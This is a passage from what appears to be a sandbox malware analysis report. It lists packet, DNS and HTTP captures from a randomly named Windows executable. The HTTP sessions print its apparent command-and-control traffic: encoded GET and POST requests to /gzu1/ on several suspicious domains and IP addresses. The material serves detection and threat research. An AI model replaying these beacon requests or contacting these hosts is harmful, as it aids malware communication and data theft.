May 2, 2024 15:09:03.580183029 CEST	49766	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:04.584167957 CEST	49767	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:04.897229910 CEST	80	49767	47.76.136.160	192.168.2.4
May 2, 2024 15:09:04.897335052 CEST	49767	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:04.899837017 CEST	49767	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:05.206440926 CEST	80	49767	47.76.136.160	192.168.2.4
May 2, 2024 15:09:05.208345890 CEST	80	49767	47.76.136.160	192.168.2.4
May 2, 2024 15:09:05.208374023 CEST	80	49767	47.76.136.160	192.168.2.4
May 2, 2024 15:09:05.208389997 CEST	80	49767	47.76.136.160	192.168.2.4
May 2, 2024 15:09:05.208518982 CEST	49767	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:05.212016106 CEST	49767	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:05.524276018 CEST	80	49767	47.76.136.160	192.168.2.4
May 2, 2024 15:09:11.636636019 CEST	49768	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:11.939292908 CEST	80	49768	47.243.134.243	192.168.2.4
May 2, 2024 15:09:11.939366102 CEST	49768	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:11.943095922 CEST	49768	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:12.247957945 CEST	80	49768	47.243.134.243	192.168.2.4
May 2, 2024 15:09:12.248049974 CEST	80	49768	47.243.134.243	192.168.2.4
May 2, 2024 15:09:12.248121977 CEST	80	49768	47.243.134.243	192.168.2.4
May 2, 2024 15:09:12.250355005 CEST	49768	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:13.454895973 CEST	49768	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:14.473397017 CEST	49769	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:14.774924040 CEST	80	49769	47.243.134.243	192.168.2.4
May 2, 2024 15:09:14.775048971 CEST	49769	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:14.777241945 CEST	49769	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:15.078521013 CEST	80	49769	47.243.134.243	192.168.2.4
May 2, 2024 15:09:15.078968048 CEST	80	49769	47.243.134.243	192.168.2.4
May 2, 2024 15:09:15.078979969 CEST	80	49769	47.243.134.243	192.168.2.4
May 2, 2024 15:09:15.079041958 CEST	49769	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:16.284316063 CEST	49769	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:17.288707972 CEST	49770	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:17.592643976 CEST	80	49770	47.243.134.243	192.168.2.4
May 2, 2024 15:09:17.592736959 CEST	49770	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:17.595299959 CEST	49770	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:17.898686886 CEST	80	49770	47.243.134.243	192.168.2.4
May 2, 2024 15:09:17.898776054 CEST	80	49770	47.243.134.243	192.168.2.4
May 2, 2024 15:09:17.898787975 CEST	80	49770	47.243.134.243	192.168.2.4
May 2, 2024 15:09:17.898967028 CEST	49770	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:17.902436972 CEST	49770	80	192.168.2.4	47.243.134.243
May 2, 2024 15:09:18.201255083 CEST	80	49770	47.243.134.243	192.168.2.4
May 2, 2024 15:09:37.401479006 CEST	49771	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:37.559833050 CEST	80	49771	162.0.237.22	192.168.2.4
May 2, 2024 15:09:37.559983015 CEST	49771	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:37.566334009 CEST	49771	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:37.727822065 CEST	80	49771	162.0.237.22	192.168.2.4
May 2, 2024 15:09:37.745630980 CEST	80	49771	162.0.237.22	192.168.2.4
May 2, 2024 15:09:37.745728970 CEST	80	49771	162.0.237.22	192.168.2.4
May 2, 2024 15:09:37.745901108 CEST	49771	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:39.063608885 CEST	49771	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:40.717351913 CEST	49772	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:40.874419928 CEST	80	49772	162.0.237.22	192.168.2.4
May 2, 2024 15:09:40.874537945 CEST	49772	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:40.903861046 CEST	49772	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:41.060964108 CEST	80	49772	162.0.237.22	192.168.2.4
May 2, 2024 15:09:41.072809935 CEST	80	49772	162.0.237.22	192.168.2.4
May 2, 2024 15:09:41.072823048 CEST	80	49772	162.0.237.22	192.168.2.4
May 2, 2024 15:09:41.072875023 CEST	49772	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:42.408283949 CEST	49772	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:43.428121090 CEST	49773	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:43.586137056 CEST	80	49773	162.0.237.22	192.168.2.4
May 2, 2024 15:09:43.586328983 CEST	49773	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:43.588320017 CEST	49773	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:43.745204926 CEST	80	49773	162.0.237.22	192.168.2.4
May 2, 2024 15:09:43.761674881 CEST	80	49773	162.0.237.22	192.168.2.4
May 2, 2024 15:09:43.761698008 CEST	80	49773	162.0.237.22	192.168.2.4
May 2, 2024 15:09:43.761868954 CEST	49773	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:43.764409065 CEST	49773	80	192.168.2.4	162.0.237.22
May 2, 2024 15:09:43.922415972 CEST	80	49773	162.0.237.22	192.168.2.4
May 2, 2024 15:09:58.504378080 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:58.678127050 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:58.678216934 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:58.680465937 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:58.857625961 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.240658998 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.240700960 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.240756989 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.240772963 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.240859032 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.240896940 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.240947008 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.241036892 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.241118908 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.241132975 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.241189957 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.241234064 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.241269112 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.241307974 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.241360903 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.414472103 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.414547920 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.414601088 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.426316977 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.426357031 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.426413059 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:09:59.432797909 CEST	80	49774	217.160.0.13	192.168.2.4
May 2, 2024 15:09:59.432853937 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:00.189467907 CEST	49774	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.208756924 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.383413076 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.383488894 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.385590076 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.556740046 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.917855024 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.917882919 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.917896032 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.917927027 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.917941093 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.917979002 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.918023109 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.918113947 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.918149948 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.918199062 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.918314934 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.918354034 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:01.918370008 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.918457031 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:01.918495893 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:02.089350939 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:02.089370012 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:02.089422941 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:02.095335960 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:02.095380068 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:02.095437050 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:02.107440948 CEST	80	49775	217.160.0.13	192.168.2.4
May 2, 2024 15:10:02.107500076 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:04.126779079 CEST	49775	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:05.144105911 CEST	49776	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:05.318018913 CEST	80	49776	217.160.0.13	192.168.2.4
May 2, 2024 15:10:05.318170071 CEST	49776	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:05.320817947 CEST	49776	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:05.494996071 CEST	80	49776	217.160.0.13	192.168.2.4
May 2, 2024 15:10:05.641791105 CEST	80	49776	217.160.0.13	192.168.2.4
May 2, 2024 15:10:05.642581940 CEST	80	49776	217.160.0.13	192.168.2.4
May 2, 2024 15:10:05.642644882 CEST	49776	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:05.644440889 CEST	49776	80	192.168.2.4	217.160.0.13
May 2, 2024 15:10:05.817969084 CEST	80	49776	217.160.0.13	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 15:05:58.201334953 CEST	53	60460	1.1.1.1	192.168.2.4
May 2, 2024 15:05:58.273554087 CEST	53	65483	1.1.1.1	192.168.2.4
May 2, 2024 15:05:58.484062910 CEST	61300	53	192.168.2.4	1.1.1.1
May 2, 2024 15:05:58.484285116 CEST	64664	53	192.168.2.4	1.1.1.1
May 2, 2024 15:05:58.574038982 CEST	53	61300	1.1.1.1	192.168.2.4
May 2, 2024 15:05:58.574651003 CEST	53	64664	1.1.1.1	192.168.2.4
May 2, 2024 15:06:00.697046995 CEST	53	56670	1.1.1.1	192.168.2.4
May 2, 2024 15:06:18.451018095 CEST	138	138	192.168.2.4	192.168.2.255
May 2, 2024 15:06:20.811672926 CEST	53	52119	1.1.1.1	192.168.2.4
May 2, 2024 15:06:40.686774969 CEST	53	60841	1.1.1.1	192.168.2.4
May 2, 2024 15:06:57.956422091 CEST	53	57161	1.1.1.1	192.168.2.4
May 2, 2024 15:07:04.122301102 CEST	53	64938	1.1.1.1	192.168.2.4
May 2, 2024 15:07:26.293911934 CEST	53	60703	1.1.1.1	192.168.2.4
May 2, 2024 15:07:26.426403046 CEST	62130	53	192.168.2.4	1.1.1.1
May 2, 2024 15:07:26.595550060 CEST	53	62130	1.1.1.1	192.168.2.4
May 2, 2024 15:07:41.344882965 CEST	58776	53	192.168.2.4	1.1.1.1
May 2, 2024 15:07:41.443680048 CEST	53	58776	1.1.1.1	192.168.2.4
May 2, 2024 15:08:10.702846050 CEST	63172	53	192.168.2.4	1.1.1.1
May 2, 2024 15:08:10.801306009 CEST	53	63172	1.1.1.1	192.168.2.4
May 2, 2024 15:08:13.381588936 CEST	53	50021	1.1.1.1	192.168.2.4
May 2, 2024 15:08:26.114779949 CEST	62023	53	192.168.2.4	1.1.1.1
May 2, 2024 15:08:26.238502026 CEST	53	62023	1.1.1.1	192.168.2.4
May 2, 2024 15:08:34.386909008 CEST	62479	53	192.168.2.4	1.1.1.1
May 2, 2024 15:08:34.590719938 CEST	53	62479	1.1.1.1	192.168.2.4
May 2, 2024 15:08:46.356210947 CEST	51096	53	192.168.2.4	1.1.1.1
May 2, 2024 15:08:46.475687027 CEST	53	51096	1.1.1.1	192.168.2.4
May 2, 2024 15:08:57.739232063 CEST	57523	53	192.168.2.4	1.1.1.1
May 2, 2024 15:08:58.740469933 CEST	57523	53	192.168.2.4	1.1.1.1
May 2, 2024 15:08:58.901956081 CEST	53	57523	1.1.1.1	192.168.2.4
May 2, 2024 15:08:58.901973009 CEST	53	57523	1.1.1.1	192.168.2.4
May 2, 2024 15:09:10.223937988 CEST	65101	53	192.168.2.4	1.1.1.1
May 2, 2024 15:09:10.840615988 CEST	53	65101	1.1.1.1	192.168.2.4
May 2, 2024 15:09:22.922322035 CEST	50664	53	192.168.2.4	1.1.1.1
May 2, 2024 15:09:23.052625895 CEST	53	50664	1.1.1.1	192.168.2.4
May 2, 2024 15:09:26.231399059 CEST	53	52474	1.1.1.1	192.168.2.4
May 2, 2024 15:09:30.100905895 CEST	57279	53	192.168.2.4	1.1.1.1
May 2, 2024 15:09:30.200740099 CEST	53	57279	1.1.1.1	192.168.2.4
May 2, 2024 15:09:37.256371021 CEST	51108	53	192.168.2.4	1.1.1.1
May 2, 2024 15:09:37.398986101 CEST	53	51108	1.1.1.1	192.168.2.4
May 2, 2024 15:09:48.792337894 CEST	64424	53	192.168.2.4	1.1.1.1
May 2, 2024 15:09:48.884429932 CEST	53	64424	1.1.1.1	192.168.2.4
May 2, 2024 15:09:56.048039913 CEST	61603	53	192.168.2.4	1.1.1.1
May 2, 2024 15:09:56.277506113 CEST	53	61603	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 2, 2024 15:05:58.484062910 CEST	192.168.2.4	1.1.1.1	0x6180	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 2, 2024 15:05:58.484285116 CEST	192.168.2.4	1.1.1.1	0x6632	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 2, 2024 15:07:26.426403046 CEST	192.168.2.4	1.1.1.1	0x397e	Standard query (0)	thequirkyartman.co.uk	A (IP address)	IN (0x0001)	false
May 2, 2024 15:07:41.344882965 CEST	192.168.2.4	1.1.1.1	0xb72a	Standard query (0)	thequirkyartman.co.uk	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:10.702846050 CEST	192.168.2.4	1.1.1.1	0xbc36	Standard query (0)	www.vegus24.org	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:26.114779949 CEST	192.168.2.4	1.1.1.1	0x6aaa	Standard query (0)	www.maerealtysg.com	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:34.386909008 CEST	192.168.2.4	1.1.1.1	0x3bde	Standard query (0)	www.holein1sa.com	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:46.356210947 CEST	192.168.2.4	1.1.1.1	0xa5d3	Standard query (0)	www.luckydomainz.shop	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:57.739232063 CEST	192.168.2.4	1.1.1.1	0x10a	Standard query (0)	www.qdzdvrk.shop	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:58.740469933 CEST	192.168.2.4	1.1.1.1	0x10a	Standard query (0)	www.qdzdvrk.shop	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:10.223937988 CEST	192.168.2.4	1.1.1.1	0x3f8e	Standard query (0)	www.cngdesk.com	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:22.922322035 CEST	192.168.2.4	1.1.1.1	0xb4df	Standard query (0)	www.golfscorecardus.com	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:30.100905895 CEST	192.168.2.4	1.1.1.1	0xdba4	Standard query (0)	www.theertyuiergthjk.homes	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:37.256371021 CEST	192.168.2.4	1.1.1.1	0x1f7b	Standard query (0)	www.shevgin.top	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:48.792337894 CEST	192.168.2.4	1.1.1.1	0x7dce	Standard query (0)	www.sfebg.com	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:56.048039913 CEST	192.168.2.4	1.1.1.1	0xe8c4	Standard query (0)	www.wrgardenrooms.co.uk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 2, 2024 15:05:58.574038982 CEST	1.1.1.1	192.168.2.4	0x6180	No error (0)	www.google.com		142.251.32.100	A (IP address)	IN (0x0001)	false
May 2, 2024 15:05:58.574651003 CEST	1.1.1.1	192.168.2.4	0x6632	No error (0)	www.google.com			65	IN (0x0001)	false
May 2, 2024 15:07:26.595550060 CEST	1.1.1.1	192.168.2.4	0x397e	No error (0)	thequirkyartman.co.uk		104.21.31.110	A (IP address)	IN (0x0001)	false
May 2, 2024 15:07:26.595550060 CEST	1.1.1.1	192.168.2.4	0x397e	No error (0)	thequirkyartman.co.uk		172.67.176.60	A (IP address)	IN (0x0001)	false
May 2, 2024 15:07:41.443680048 CEST	1.1.1.1	192.168.2.4	0xb72a	No error (0)	thequirkyartman.co.uk		172.67.176.60	A (IP address)	IN (0x0001)	false
May 2, 2024 15:07:41.443680048 CEST	1.1.1.1	192.168.2.4	0xb72a	No error (0)	thequirkyartman.co.uk		104.21.31.110	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:10.801306009 CEST	1.1.1.1	192.168.2.4	0xbc36	No error (0)	www.vegus24.org	vegus24.org		CNAME (Canonical name)	IN (0x0001)	false
May 2, 2024 15:08:10.801306009 CEST	1.1.1.1	192.168.2.4	0xbc36	No error (0)	vegus24.org		3.33.130.190	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:10.801306009 CEST	1.1.1.1	192.168.2.4	0xbc36	No error (0)	vegus24.org		15.197.148.33	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:26.238502026 CEST	1.1.1.1	192.168.2.4	0x6aaa	Name error (3)	www.maerealtysg.com	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:34.590719938 CEST	1.1.1.1	192.168.2.4	0x3bde	No error (0)	www.holein1sa.com		213.171.195.105	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:46.475687027 CEST	1.1.1.1	192.168.2.4	0xa5d3	No error (0)	www.luckydomainz.shop	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
May 2, 2024 15:08:46.475687027 CEST	1.1.1.1	192.168.2.4	0xa5d3	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:58.901956081 CEST	1.1.1.1	192.168.2.4	0x10a	No error (0)	www.qdzdvrk.shop	cjhm.737773.cn		CNAME (Canonical name)	IN (0x0001)	false
May 2, 2024 15:08:58.901956081 CEST	1.1.1.1	192.168.2.4	0x10a	No error (0)	cjhm.737773.cn		47.76.136.160	A (IP address)	IN (0x0001)	false
May 2, 2024 15:08:58.901973009 CEST	1.1.1.1	192.168.2.4	0x10a	No error (0)	www.qdzdvrk.shop	cjhm.737773.cn		CNAME (Canonical name)	IN (0x0001)	false
May 2, 2024 15:08:58.901973009 CEST	1.1.1.1	192.168.2.4	0x10a	No error (0)	cjhm.737773.cn		47.76.136.160	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:10.840615988 CEST	1.1.1.1	192.168.2.4	0x3f8e	No error (0)	www.cngdesk.com		47.243.134.243	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:23.052625895 CEST	1.1.1.1	192.168.2.4	0xb4df	Name error (3)	www.golfscorecardus.com	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:30.200740099 CEST	1.1.1.1	192.168.2.4	0xdba4	Name error (3)	www.theertyuiergthjk.homes	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:37.398986101 CEST	1.1.1.1	192.168.2.4	0x1f7b	No error (0)	www.shevgin.top		162.0.237.22	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:48.884429932 CEST	1.1.1.1	192.168.2.4	0x7dce	Name error (3)	www.sfebg.com	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 15:09:56.277506113 CEST	1.1.1.1	192.168.2.4	0xe8c4	No error (0)	www.wrgardenrooms.co.uk		217.160.0.13	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

slscr.update.microsoft.com

thequirkyartman.co.uk

www.vegus24.org

www.holein1sa.com

www.luckydomainz.shop

www.qdzdvrk.shop

www.cngdesk.com

www.shevgin.top

www.wrgardenrooms.co.uk

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49758	3.33.130.190	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:10.897602081 CEST	388	OUT	GET /gzu1/?7Br4wVx=S3P2x5ip62J7+Oy/khyvyepdpnn6OsRBEClp69tTyp5C0OExptGWhV1rUv2ZsdonVFK5TsIP8T+xoHN8zHMPLILivDQ16J/iew4jcSCgqKm6zoWIRy2zzVk=&Y0H=66WP HTTP/1.1 Host: www.vegus24.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:08:10.994473934 CEST	392	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 May 2024 13:08:10 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 42 72 34 77 56 78 3d 53 33 50 32 78 35 69 70 36 32 4a 37 2b 4f 79 2f 6b 68 79 76 79 65 70 64 70 6e 6e 36 4f 73 52 42 45 43 6c 70 36 39 74 54 79 70 35 43 30 4f 45 78 70 74 47 57 68 56 31 72 55 76 32 5a 73 64 6f 6e 56 46 4b 35 54 73 49 50 38 54 2b 78 6f 48 4e 38 7a 48 4d 50 4c 49 4c 69 76 44 51 31 36 4a 2f 69 65 77 34 6a 63 53 43 67 71 4b 6d 36 7a 6f 57 49 52 79 32 7a 7a 56 6b 3d 26 59 30 48 3d 36 36 57 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Br4wVx=S3P2x5ip62J7+Oy/khyvyepdpnn6OsRBEClp69tTyp5C0OExptGWhV1rUv2ZsdonVFK5TsIP8T+xoHN8zHMPLILivDQ16J/iew4jcSCgqKm6zoWIRy2zzVk=&Y0H=66WP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	213.171.195.105	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:34.757334948 CEST	664	OUT	POST /gzu1/ HTTP/1.1 Host: www.holein1sa.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Origin: http://www.holein1sa.com Referer: http://www.holein1sa.com/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 59 52 55 71 33 59 53 6b 50 61 43 44 65 48 65 39 71 4e 4a 76 65 2b 61 54 44 6d 54 47 4d 64 63 57 73 75 57 70 4a 4f 48 4e 69 4b 34 2f 70 62 4c 4a 42 79 75 2f 4e 6c 71 6e 50 72 4a 7a 67 53 59 65 47 37 5a 6e 78 67 46 74 64 48 54 47 6d 6a 7a 35 6c 50 75 69 6c 78 4b 75 31 6c 57 6d 6c 58 51 47 67 75 39 34 37 71 36 75 50 51 35 62 66 74 6c 58 6b 42 6f 57 62 36 6a 43 4d 55 6d 75 4b 4f 74 66 62 72 4f 69 66 4f 4e 37 52 35 34 43 71 77 51 7a 39 64 46 64 43 35 6d 37 6a 2f 73 38 59 73 33 46 44 57 36 4c 48 79 61 70 43 77 76 68 74 76 74 6d 64 30 6e 77 6a 6f 33 57 79 77 6c 32 4f 67 53 65 66 41 3d 3d Data Ascii: 7Br4wVx=YRUq3YSkPaCDeHe9qNJve+aTDmTGMdcWsuWpJOHNiK4/pbLJByu/NlqnPrJzgSYeG7ZnxgFtdHTGmjz5lPuilxKu1lWmlXQGgu947q6uPQ5bftlXkBoWb6jCMUmuKOtfbrOifON7R54CqwQz9dFdC5m7j/s8Ys3FDW6LHyapCwvhtvtmd0nwjo3Wywl2OgSefA==
May 2, 2024 15:08:34.919249058 CEST	309	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Thu, 02 May 2024 13:08:34 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49760	213.171.195.105	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:38.016860008 CEST	684	OUT	POST /gzu1/ HTTP/1.1 Host: www.holein1sa.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Origin: http://www.holein1sa.com Referer: http://www.holein1sa.com/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 59 52 55 71 33 59 53 6b 50 61 43 44 66 6b 57 39 70 74 31 76 57 2b 61 51 50 47 54 47 58 4e 63 53 73 75 4b 70 4a 50 44 64 69 35 63 2f 6e 61 37 4a 41 33 43 2f 64 31 71 6e 45 4c 4a 32 34 79 59 56 47 37 64 56 78 68 35 74 64 48 76 47 6d 6d 66 35 6d 2b 75 